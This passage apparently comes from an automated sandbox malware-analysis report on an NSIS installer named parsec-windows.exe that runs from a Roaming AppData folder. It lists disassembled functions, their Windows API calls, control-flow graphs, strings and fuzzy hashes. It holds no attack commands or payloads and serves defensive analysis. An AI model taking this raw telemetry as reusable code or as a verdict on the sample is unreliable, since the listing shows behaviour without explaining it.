4442 40655f WideCharToMultiByte 4434->4442 4436 40268d lstrlenA 4436->4437 4438 4026d1 4437->4438 4439 4026e7 4437->4439 4441 40610e 5 API calls 4437->4441 4438->4439 4440 4060df WriteFile 4438->4440 4440->4439 4441->4438 4442->4436

                              Executed Functions

                              Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 621 405c49-405c6f call 405f14 624 405c71-405c83 DeleteFileW 621->624 625 405c88-405c8f 621->625 626 405e05-405e09 624->626 627 405c91-405c93 625->627 628 405ca2-405cb2 call 40653d 625->628 629 405db3-405db8 627->629 630 405c99-405c9c 627->630 636 405cc1-405cc2 call 405e58 628->636 637 405cb4-405cbf lstrcatW 628->637 629->626 632 405dba-405dbd 629->632 630->628 630->629 634 405dc7-405dcf call 406873 632->634 635 405dbf-405dc5 632->635 634->626 645 405dd1-405de5 call 405e0c call 405c01 634->645 635->626 639 405cc7-405ccb 636->639 637->639 641 405cd7-405cdd lstrcatW 639->641 642 405ccd-405cd5 639->642 644 405ce2-405cfe lstrlenW FindFirstFileW 641->644 642->641 642->644 646 405d04-405d0c 644->646 647 405da8-405dac 644->647 661 405de7-405dea 645->661 662 405dfd-405e00 call 40559f 645->662 649 405d2c-405d40 call 40653d 646->649 650 405d0e-405d16 646->650 647->629 652 405dae 647->652 663 405d42-405d4a 649->663 664 405d57-405d62 call 405c01 649->664 653 405d18-405d20 650->653 654 405d8b-405d9b FindNextFileW 650->654 652->629 653->649 657 405d22-405d2a 653->657 654->646 660 405da1-405da2 FindClose 654->660 657->649 657->654 660->647 661->635 667 405dec-405dfb call 40559f call 4062fd 661->667 662->626 663->654 668 405d4c-405d55 call 405c49 663->668 672 405d83-405d86 call 40559f 664->672 673 405d64-405d67 664->673 667->626 668->654 672->654 676 405d69-405d79 call 40559f call 4062fd 673->676 677 405d7b-405d81 673->677 676->654 677->654
                              APIs
                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBA
                              • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CDD
                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                              • FindClose.KERNEL32(00000000), ref: 00405DA2
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*$\*.*
                              • API String ID: 2035342205-2100005695
                              • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                              • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                              • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                              • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                              Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNELBASE(75923420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                              • FindClose.KERNELBASE(00000000), ref: 0040688A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID: C:\
                              • API String ID: 2295610775-3404278061
                              • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                              • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                              • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                              • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                              • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                              • Opcode Fuzzy Hash: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                              • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                              Function 00404F06 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 489windowmemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 141 404f06-404f52 GetDlgItem * 2 142 404f58-404ff0 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 141->142 143 40517d-405184 141->143 146 404ff2-404ffd SendMessageW 142->146 147 404fff-405006 DeleteObject 142->147 144 405186-405196 143->144 145 405198 143->145 148 40519b-4051a4 144->148 145->148 146->147 149 405008-405010 147->149 150 4051a6-4051a9 148->150 151 4051af-4051b5 148->151 152 405012-405015 149->152 153 405039-40503d 149->153 150->151 155 405293-40529a 150->155 156 4051c4-4051cb 151->156 157 4051b7-4051be 151->157 158 405017 152->158 159 40501a-405037 call 40657a SendMessageW * 2 152->159 153->149 154 40503f-40506f call 404499 * 2 153->154 197 405075-40507b 154->197 198 40513f-405152 GetWindowLongW SetWindowLongW 154->198 164 40530b-405313 155->164 165 40529c-4052a2 155->165 160 405240-405243 156->160 161 4051cd-4051d0 156->161 157->155 157->156 158->159 159->153 160->155 166 405245-40524f 160->166 169 4051d2-4051d9 161->169 170 4051db-4051f0 call 404e54 161->170 167 405315-40531b SendMessageW 164->167 168 40531d-405324 164->168 173 4052a8-4052b2 165->173 174 4054fe-405510 call 404500 165->174 175 405251-40525d SendMessageW 166->175 176 40525f-405269 166->176 167->168 178 405326-40532d 168->178 179 405358-40535f 168->179 169->160 169->170 170->160 196 4051f2-405203 170->196 173->174 182 4052b8-4052c7 SendMessageW 173->182 175->176 176->155 183 40526b-405275 176->183 185 405336-40533d 178->185 186 40532f-405330 ImageList_Destroy 178->186 189 4054c0-4054c7 179->189 190 405365-405371 call 4011ef 179->190 182->174 191 4052cd-4052de SendMessageW 182->191 192 405286-405290 183->192 193 405277-405284 183->193 194 405346-405352 185->194 195 40533f-405340 GlobalFree 185->195 186->185 189->174 202 4054c9-4054d0 189->202 215 405381-405384 190->215 216 405373-405376 190->216 200 4052e0-4052e6 191->200 201 4052e8-4052ea 191->201 192->155 193->155 194->179 195->194 196->160 205 405205-405207 196->205 206 40507e-405084 197->206 204 405158-40515b 198->204 200->201 208 4052eb-405304 call 401299 SendMessageW 200->208 201->208 202->174 203 4054d2-4054fc ShowWindow GetDlgItem ShowWindow 202->203 203->174 209 405175-405178 call 4044ce 204->209 210 40515d-405170 ShowWindow call 4044ce 204->210 211 405209-405210 205->211 212 40521a 205->212 213 405121-405134 206->213 214 40508a-4050b5 206->214 208->164 209->143 210->174 223 405212-405214 211->223 224 405216-405218 211->224 225 40521d-405239 call 40117d 212->225 213->206 218 40513a-40513d 213->218 226 4050f1-4050f3 214->226 227 4050b7-4050ef SendMessageW 214->227 219 4053c5-4053e9 call 4011ef 215->219 220 405386-40539f call 4012e2 call 401299 215->220 228 405378 216->228 229 405379-40537c call 404ed4 216->229 218->198 218->204 242 40548b-405494 219->242 243 4053ef 219->243 248 4053a1-4053a7 220->248 249 4053af-4053be SendMessageW 220->249 223->225 224->225 225->160 235 4050f5-405107 SendMessageW 226->235 236 405109-40511e SendMessageW 226->236 227->213 228->229 229->215 235->213 236->213 245 4054a2-4054aa 242->245 246 405496-40549c InvalidateRect 242->246 247 4053f2-4053fd 243->247 245->189 252 4054ac-4054bb call 404e27 call 404e0f 245->252 246->245 250 405473-405485 247->250 251 4053ff-40540e 247->251 255 4053a9 248->255 256 4053aa-4053ad 248->256 249->219 250->242 250->247 253 405410-40541d 251->253 254 405421-405424 251->254 252->189 253->254 258 405426-405429 254->258 259 40542b-405434 254->259 255->256 256->248 256->249 261 405439-405471 SendMessageW * 2 258->261 259->261 262 405436 259->262 261->250 262->261
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                              • GetDlgItem.USER32(?,00000408), ref: 00404F29
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                              • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                              • DeleteObject.GDI32(00000000), ref: 00405000
                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                              • ShowWindow.USER32(?,00000005), ref: 00405162
                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                              • ImageList_Destroy.COMCTL32(?), ref: 00405330
                              • GlobalFree.KERNEL32(?), ref: 00405340
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                              • ShowWindow.USER32(?,00000000), ref: 004054EA
                              • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                              • ShowWindow.USER32(00000000), ref: 004054FC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $>)h$M$N
                              • API String ID: 2564846305-1609033495
                              • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                              • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                              • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                              • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                              Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 496 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 499 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 496->499 500 4030cd-4030d2 496->500 508 4031f0-4031fe call 403019 499->508 509 40310b 499->509 501 4032ad-4032b1 500->501 515 403200-403203 508->515 516 403253-403258 508->516 511 403110-403127 509->511 513 403129 511->513 514 40312b-403134 call 4034cf 511->514 513->514 522 40325a-403262 call 403019 514->522 523 40313a-403141 514->523 518 403205-40321d call 4034e5 call 4034cf 515->518 519 403227-403251 GlobalAlloc call 4034e5 call 4032b4 515->519 516->501 518->516 542 40321f-403225 518->542 519->516 547 403264-403275 519->547 522->516 527 403143-403157 call 405fe8 523->527 528 4031bd-4031c1 523->528 533 4031cb-4031d1 527->533 545 403159-403160 527->545 532 4031c3-4031ca call 403019 528->532 528->533 532->533 538 4031e0-4031e8 533->538 539 4031d3-4031dd call 4069f7 533->539 538->511 546 4031ee 538->546 539->538 542->516 542->519 545->533 551 403162-403169 545->551 546->508 548 403277 547->548 549 40327d-403282 547->549 548->549 552 403283-403289 549->552 551->533 553 40316b-403172 551->553 552->552 554 40328b-4032a6 SetFilePointer call 405fe8 552->554 553->533 555 403174-40317b 553->555 559 4032ab 554->559 555->533 556 40317d-40319d 555->556 556->516 558 4031a3-4031a7 556->558 560 4031a9-4031ad 558->560 561 4031af-4031b7 558->561 559->501 560->546 560->561 561->533 562 4031b9-4031bb 561->562 562->533
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040308E
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                              • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                              • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\PSecWin$C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                              • API String ID: 2803837635-564946033
                              • Opcode ID: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                              • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                              • Opcode Fuzzy Hash: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                              • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                              Function 0040657A Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 196stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 563 40657a-406585 564 406587-406596 563->564 565 406598-4065ae 563->565 564->565 566 4065b0-4065bd 565->566 567 4065c6-4065cf 565->567 566->567 568 4065bf-4065c2 566->568 569 4065d5 567->569 570 4067aa-4067b5 567->570 568->567 571 4065da-4065e7 569->571 572 4067c0-4067c1 570->572 573 4067b7-4067bb call 40653d 570->573 571->570 574 4065ed-4065f6 571->574 573->572 576 406788 574->576 577 4065fc-406639 574->577 580 406796-406799 576->580 581 40678a-406794 576->581 578 40672c-406731 577->578 579 40663f-406646 577->579 585 406733-406739 578->585 586 406764-406769 578->586 582 406648-40664a 579->582 583 40664b-40664d 579->583 584 40679b-4067a4 580->584 581->584 582->583 587 40668a-40668d 583->587 588 40664f-40666d call 40640b 583->588 584->570 591 4065d7 584->591 592 406749-406755 call 40653d 585->592 593 40673b-406747 call 406484 585->593 589 406778-406786 lstrlenW 586->589 590 40676b-406773 call 40657a 586->590 597 40669d-4066a0 587->597 598 40668f-40669b GetSystemDirectoryW 587->598 602 406672-406676 588->602 589->584 590->589 591->571 601 40675a-406760 592->601 593->601 604 4066a2-4066b0 GetWindowsDirectoryW 597->604 605 406709-40670b 597->605 603 40670d-406711 598->603 601->589 606 406762 601->606 608 406713-406717 602->608 609 40667c-406685 call 40657a 602->609 603->608 610 406724-40672a call 4067c4 603->610 604->605 605->603 607 4066b2-4066ba 605->607 606->610 614 4066d1-4066e7 SHGetSpecialFolderLocation 607->614 615 4066bc-4066c5 607->615 608->610 611 406719-40671f lstrcatW 608->611 609->603 610->589 611->610 616 406705 614->616 617 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 614->617 620 4066cd-4066cf 615->620 616->605 617->603 617->616 620->603 620->614
                              APIs
                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 00406695
                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00000000,00424620,759223A0), ref: 004066A8
                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000), ref: 00406779
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Directory$SystemWindowslstrcatlstrlen
                              • String ID: 0x000017F5$>)h$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 4260037668-1717792647
                              • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                              • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                              • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                              • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 748 40176f-401794 call 402da6 call 405e83 753 401796-40179c call 40653d 748->753 754 40179e-4017b0 call 40653d call 405e0c lstrcatW 748->754 759 4017b5-4017b6 call 4067c4 753->759 754->759 763 4017bb-4017bf 759->763 764 4017c1-4017cb call 406873 763->764 765 4017f2-4017f5 763->765 772 4017dd-4017ef 764->772 773 4017cd-4017db CompareFileTime 764->773 766 4017f7-4017f8 call 406008 765->766 767 4017fd-401819 call 40602d 765->767 766->767 775 40181b-40181e 767->775 776 40188d-4018b6 call 40559f call 4032b4 767->776 772->765 773->772 777 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 775->777 778 40186f-401879 call 40559f 775->778 788 4018b8-4018bc 776->788 789 4018be-4018ca SetFileTime 776->789 777->763 810 401864-401865 777->810 790 401882-401888 778->790 788->789 792 4018d0-4018db CloseHandle 788->792 789->792 793 402c33 790->793 796 4018e1-4018e4 792->796 797 402c2a-402c2d 792->797 798 402c35-402c39 793->798 800 4018e6-4018f7 call 40657a lstrcatW 796->800 801 4018f9-4018fc call 40657a 796->801 797->793 807 401901-4023a2 call 405b9d 800->807 801->807 807->797 807->798 810->790 812 401867-401868 810->812 812->778
                              APIs
                              • lstrcatW.KERNEL32(00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017B0
                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files\Parsec\parsecd.exe","C:\Program Files\Parsec\parsecd.exe",00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017D5
                                • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                • Part of subcall function 0040559F: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                • Part of subcall function 0040559F: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00403418,00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0), ref: 004055FA
